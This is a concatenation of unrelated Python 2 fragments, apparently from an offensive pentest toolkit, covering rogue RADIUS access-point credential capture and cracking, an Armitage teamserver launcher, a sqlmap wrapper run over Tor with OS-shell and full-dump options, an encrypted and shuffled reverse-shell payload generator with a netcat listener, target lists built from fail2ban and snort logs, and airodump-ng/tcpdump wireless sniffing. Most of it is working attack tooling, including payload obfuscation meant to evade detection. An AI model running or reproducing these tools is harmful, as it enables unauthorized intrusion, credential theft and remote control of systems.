def main(): print """ \t#1. Start the FreeRADIUS server, the HostAPD access point, and Cylon-Raider \t#2. EDIT the temporary hostapd configuration file \t#3. DUMP logs for FreeRADIUS Wireless Pawn Edition \t#4. CRACK the challenge response strings to find the password ### Alternative Commands ### # 666. SETUP - Install the required components to conduct this attack """ opt_choice = int(raw_input(toolkits.yellow("Enter a OPTION: "))) if opt_choice == 1: start_radius_server() main() elif opt_choice == 2: write_hostapd_conf() main() elif opt_choice == 3: dump_challenge_response() main() elif opt_choice == 4: crack_challenge_response() main() elif opt_choice == 666: setup_freeradius() main() else: print toolkits.red("You have entered a invalid option") main() return
def main(): print toolkits.cyan(""" \n\n\n \t\tForeplay, EZ-Mode Armitage Teamserver Collaboration Menu \n\t\t\t\tCOMMANDS\n LAUNCH - Launch the Armitage Teamserver using NEW CREDENTIALS LOAD - Load PREVIOUSLY SAVED CREDENTIALS and launch a teamserver from that EXIT - Exit program """) opt_choice = str(raw_input(toolkits.yellow("Enter a COMMAND: "))) if opt_choice == "LAUNCH": collect_teamserver_creds(save_file) main() elif opt_choice == "LOAD": load_saved_teamserver_creds(save_file) main() elif opt_choice == "EXIT": print toolkits.red('Received exit command, exiting!') exit(0) else: print toolkits.red( 'You have entered a invalid option, please try again') main() return
def main(): print toolkits.yellow(""" SQLMAP OPTIONS: \tLIST: Get a database list of the target URL (or URLs) \tEDIT: Edit the wordlist of targeted URLs \tEXIT: Exit program """) opt_choice = str(raw_input(toolkits.yellow("Enter a COMMAND: "))) if opt_choice == "LIST": os.system('clear') read_target_list(wordlist) main() elif opt_choice == "EDIT": os.system('clear') edit_wordlist() main() elif opt_choice == "EXIT": exit(0) else: os.system('clear') print toolkits.red("You have entered a invalid option") main() return
def main(): decryptKey = generateKey() decryptIV = generateIV() code = read_template() template_reverse_shell payloadNoEncrypt = template_reverse_shell.splitlines() shuffledPayload = commandSegmentationTech(payloadNoEncrypt) # writableLines = convertIntoLines(shuffledPayload) l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV) outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV) print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload))) out = b64encode(l_encrypted) print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out))) print green("DEBUG: Payload generated at\r\n{}".format(str(outfile))) rp = open(outfile, 'rb+') uniquePayload = rp.read() print red("DEBUG: Contents of {}\r\n".format(str(outfile))) print yellow(uniquePayload) print cyan("Opening netcat session") os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format( str(LPORT))) print green("You may run the payload with\r\npython {}".format( str(outfile))) time.sleep(2) print green("Executing payload") os.system("python {}".format(str(outfile))) return
def reconstituteLine(shuffledLine,arrayMap): cmd="" print red("DEBUG: Shuffled Line to Reconstitute\r\n{}".format(shuffledLine)) print yellow("DEBUG: arrayMap to reconstitute the payload\r\n{}".format(arrayMap)) for indice in arrayMap: cmd = "{}{}".format(str(cmd),str(shuffledLine[indice])) print green("DEBUG: Reconstituted Command:\r\n{}".format(str(cmd))) return cmd
def parse_fail2ban_snort_logs(default_target_list): debug_str = "DEBUG: The default target list is {0}".format( str(default_target_list)) print debug_str # clears out the default target list # WIPE_DEFAULT_target_list_cmd = "echo '' > {0}".format(str(default_target_list)) # os.system(WIPE_DEFAULT_target_list_cmd) # output = '' # bug solution. Python will not allow me to pass SHELL PIPE ARGUMENTS but I can still run the variables as arugments, and then store the output as a variable, and then write it to a document. # starts off by parsing banned IPs in fail2ban logs # https://stackoverflow.com/questions/20291543/cant-execute-shell-script-from-python-subprocess-permission-denied # this link basically states that python is inadequate for nrunning shell commands # next solution is a generate-a-script code which woulod be better because we can take advantage of specifying the command until bash for the better features. INTERNAL_ip_addr = "*.*.*.*" default_target_list = "/tmp/default_target_list.txt" # generate exclude file generally assuming that everything in your /etc/hosts directory is something you want to exclude from the pentest default_exclude_list = "/tmp/exclude_file.txt" bash_command("""cat /etc/hosts | awk '{{print $1}}' > {0}""".format( str(default_exclude_list))) script_1_name = "./bash_parse_fail2ban.sh" script_2_name = "./bash_parse_snort_logs.sh" # bash_script = '' # CMD_execute_bash = "/bin/bash {0}".format(str(bash_script)) # # bash_script = script_1_name # os.system(CMD_execute_bash) # initial_scan(default_target_list) bash_command( """cd /var/log;egrep -irh "Ban" fail2ban* --color | awk -F "NOTICE" '{ print $2 }' | uniq -c > banned-ips.txt && cat banned-ips.txt | awk '{ print $4 }' | strings > /tmp/default_target_list.txt""" ) bash_command( """cd /var/log/snort;egrep -irh " -> *.*.*.*" * --color | sort -k 2 | awk -F "->" '{ print $1 $2 }'| awk -F " " '{ print $2 "|" $3 }' | awk -F ":" '{ print $1 }' >> /tmp/default_target_list.txt""" ) bash_command("""cat /tmp/default_target_list.txt""") print toolkits.red( "DEBUG: Checking if the default target list is enumerated") time.sleep(3) initial_scan(default_target_list) return default_target_list
def writeUniquePayload(code, l_encrypted, decryptKey, decryptIV, outfile=payload2): cmd = "touch {}".format(str(outfile)) subprocess.call(cmd, shell=True, executable='/bin/bash') out = b64encode(l_encrypted) w = open(outfile, 'wb+') for line in code: print red( "DEBUG: function=writeUniquePayload Type(code):\r\n{}".format( str(type(code)))) print red( "DEBUG: function=writeUniquePayload Type(line):\r\n{}".format( str(type(line)))) if 'key=' in line: kline = 'key="""{}"""'.format(str(decryptKey)) line = line.replace('key=', kline) if 'iv=' in line: ivline = 'iv="""{}"""'.format(str(decryptIV)) line = line.replace('iv=', ivline) if 'pld=' in line: pldline1 = 'pld=str("""' pldline2 = "{}".format(str(out)) pldline3 = '""")' pldline = """ {} {} {} """.format(str(pldline1), str(pldline2), str(pldline3)) line = line.replace('pld=', pldline) w.write('\r\n' + line) w.close() cmd = "ls $PWD/{}".format(str(outfile)) of = subprocess.Popen(cmd, shell=True, executable='/bin/bash', stdout=subprocess.PIPE, stderr=subprocess.PIPE) ofile = str(of.stdout.read().encode('utf-8')).strip().rstrip() print "Payload saved at:\r\n{}".format(str(ofile)) return outfile
#!/usr/bin/env python # coding=UTF-8 import os import socket import operator import sys import toolkits os.chdir("/root/ArmsCommander/recon/sqlmap_improvement_project/") wordlist = "/root/ArmsCommander/recon/sqlmap_improvement_project/target_list" print toolkits.red("Starting up Tor Service") os.system("gnome-terminal -e 'bash -c \"tor; exec bash\"'") def get_db_list(target_str): cmd_str = """sqlmap -u "{0}" -v 6 --tor --check-tor --level=5 --risk=3 --batch --dbs -a -b --dump-all --os-shell --os-pwn --random-agent """.format(str(target_str)) print 'DEBUG: %s' % cmd_str os.system(cmd_str.strip()) return def read_target_list(wordlist): list_of_strings = "{0}".format(str(wordlist)) r = open(list_of_strings, 'r') # line = r.readline() row_number = 1
def red(string): string = toolkits.red(string) print string return string
def build_cmd_str_and_begin(target_search_regex, save_file, mon_mode_interface, options_str): cap_file_dir = '/root/Cylon-Raider-Lite/logs' timestr = time.strftime("%Y%m%d-%H%M%S") # append the regex string if entered if target_search_regex != '': # target_search_regex = '--essid-regex ' + target_search_regex target_search_regex = """ --essid-regex "{0}" """.format( str(target_search_regex)) # This bullshit here is the get TCPDUMP to run in the background # but nothing works, even threading, so I tried to make it a popup # DOesn't work either even though it should capture_Interface = mon_mode_interface # tcpdump_filename = cap_file_dir + 'tcpdump_monitor_mode_' + timestr + '.pcap' # os.system("gnome-terminal -e 'bash -c \"python /root/Cylon-Raider-Lite/tcp_dump_background.py; exec bash\"'") # module_name = '/root/Cylon-Raider-Lite/tcp_dump_background.py' # cmd_str = """gnome-terminal -e 'bash -c \"python {0}; exec bash\"""".format( # str(module_name) # ) # os.system(cmd_str) print toolkits.red('TCPDump executed') # Working code, airodump-ng --band abg cmd_str = "airodump-ng --band abg {0} {1} -a --write {2}/{3}_{5}_monitor_mode_capture.csv --write-interval 5 --output-format csv {4}".format( str(options_str), str(target_search_regex), str(cap_file_dir), str(timestr), str(mon_mode_interface), str(save_file)) print toolkits.red('Airodump-executed') # need to fix format cmd_str = cmd_str.strip() print 'DEBUG: Command string = ' + cmd_str # x = threading.Thread(name='subthread_hidden_ap_decloaker', target=subthread_hidden_ap_decloaker(mon_mode_interface)) # x.start() # #y = threading.Thread(name='subthread_tcp_dump', target=subthread_tcp_dump(mon_mode_interface)) # y.start() os.system( "gnome-terminal -e 'bash -c \"python /root/Cylon-Raider-Lite/sniffHidden.py; exec bash\"'" ) os.system( "gnome-terminal -e 'bash -c \"tcpdump & -w filename.pcap -i wlan1mon; exec bash\"'" ) os.system(cmd_str) # dont forget channel # x = threading.Thread(name='subthread_hidden_ap_decloaker', target=subthread_hidden_ap_decloaker(mon_mode_interface)) # x.start() #y = threading.Thread(name='subthread_tcp_dump', target=subthread_tcp_dump(mon_mode_interface)) # y.start() if KeyboardInterrupt: stop_mon_mode_str = "airmon-ng stop %s" % str(mon_mode_interface) #os.system('airmon-ng check kill') os.system('killall tcpdump') os.system(stop_mon_mode_str) os.system( 'cat /root/Cylon-Raider-Lite/logs/*.csv > /sdcard/Cylon_Raider_Recon.txt' ) os.system( 'cat /root/Cylon-Raider-Lite/logs/*.csv >/root/Cylon_Raider_Recon.txt' ) # x.terminate() return